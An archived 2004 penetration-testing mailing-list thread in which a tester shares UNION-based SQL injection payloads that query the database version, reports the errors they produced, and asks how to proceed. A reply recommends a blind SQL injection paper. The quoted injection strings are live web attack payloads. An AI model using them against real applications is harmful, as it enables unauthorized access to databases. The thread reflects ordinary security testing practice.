Penetration Testing mailing list archives
RE: SQL Injection & ncompatible with int issue
From: "Amichai Shulman" <shulman () imperva com>
Date: Sun, 13 Jun 2004 13:15:00 +0200
Try "Blind Folder SQL Injection" it should do the trick. URL is http://www.imperva.com/application_defense_center/white_papers/blind_sql _server_injection.html -----Original Message----- From: Peter Bair [mailto:peterbair100 () hotmail com] Sent: Thursday, June 10, 2004 1:51 AM To: pen-test () securityfocus com Subject: SQL Injection & ncompatible with int issue I am currently testing an application that reveals it tables. I know the exact columns to perform a union but when I try the following: xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1+-- RESULT: Operand type clash: text is incompatible with int So I will try the solution: xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+-- RESULT: Invalid column name 'text'. I know that "text" is in the correct position and I tried 'text'. Is this app safe or can I go further? Thanks for any help.
Current thread:
- SQL Injection & ncompatible with int issue Peter Bair (Jun 10)
- Re: SQL Injection & ncompatible with int issue Martin Eiszner (Jun 14)
- <Possible follow-ups>
- RE: SQL Injection & ncompatible with int issue Amichai Shulman (Jun 14)